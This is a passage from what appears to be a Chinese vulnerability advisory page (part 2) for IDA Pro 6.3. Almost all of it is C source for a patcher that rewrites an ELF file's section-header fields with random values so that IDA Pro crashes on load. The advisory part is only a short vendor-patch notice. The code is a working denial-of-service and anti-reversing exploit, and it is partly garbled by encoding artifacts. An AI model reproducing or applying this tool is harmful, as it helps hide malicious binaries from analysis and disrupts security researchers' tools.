IDA Pro 'ELF'文件远程拒绝服务漏洞(2)

printf("######################################################\n");
printf("#                                                    #\n");
printf("# IDA Pro 6.3 - ELF anti-debugging/reversing patcher #\n");
printf("#                      -nitr0us-                    #\n");
printf("#                                                    #\n");
printf("######################################################\n\n");

if(argc < 2){
fprintf(stderr, "Usage: %s <elf_file_to_patch>\n", argv[0]);
exit(-1);
}

if((fd =3D open(argv[1], O_RDWR)) =3D=3D -1){
perror("open");
exit(-1);
}

if(!isELF(fd)){
close(fd);
exit(-1);
}

// Mapping to memory only the necessary bytes [sizeof(header)]
if((header =3D (Elf32_Ehdr *) mmap(NULL, sizeof(header), PROT_READ | PRO=
T_WRITE, MAP_SHARED, fd, 0)) =3D=3D MAP_FAILED){
perror("mmap");
close(fd);
exit(-1);
}

printf("[*] The ELF file originally has:\n");
printf("[-] Ehdr->e_shnum:    %5d (0x%.4x)\n", header->e_shnum, header->=
e_shnum);
printf("[-] Ehdr->e_shstrndx: %5d (0x%.4x)\n\n", header->e_shstrndx, hea=
der->e_shstrndx);

printf("[*] Patching \"%s\" with new random() values...\n\n", argv[1]);

srand(time(NULL)); // seed for rand()

new_shnum    =3D (Elf32_Half) rand() % 0x1337;
new_shstrndx =3D (Elf32_Half) 0;

while(new_shstrndx < new_shnum)
new_shstrndx =3D (Elf32_Half) rand() % 0xDEAD;

header->e_shnum    =3D new_shnum;
header->e_shstrndx =3D new_shstrndx;

// Synchronize the ELF in file system with the previous memory mapped
if(msync(NULL, 0, MS_SYNC) =3D=3D -1){
perror("msync");
close(fd);
exit(-1);
}

close(fd);
munmap(header, 0);

printf("[*] The patched ELF file now has:\n");
printf("[+] Ehdr->e_shnum:    %5d (0x%.4x)\n", new_shnum, new_shnum);
printf("[+] Ehdr->e_shstrndx: %5d (0x%.4x)\n\n", new_shstrndx, new_shstr=
ndx);

printf("[*] IDA Pro 6.3 should crash trying to load \"%s\"\n", argv[1]);

return 0;
}

int isELF(int fd)
{
Elf32_Ehdrheader;

if(read(fd, &header, sizeof(header)) =3D=3D -1){
perror("isELF(): read");
return 0;
}

/* magic number verification */
if(memcmp(header.e_ident, e_magic, 4) !=3D 0){
fprintf(stderr, "The argument given is not an ELF file !\n");
return 0;
}

/* 32-bit class verification */
if(header.e_ident[4] !=3D ELFCLASS32){
fprintf(stderr, "Only 32-bit ELF files supported !\n");
return 0;
}

/* little-endian verification */
if(header.e_ident[5] !=3D ELFDATA2LSB){
fprintf(stderr, "Only little-endian ELF files supported !\n");
return 0;
}

return 1;
}

建议:
--------------------------------------------------------------------------------
厂商补丁:

Hex-Rays
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

linux

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/wygjyg.html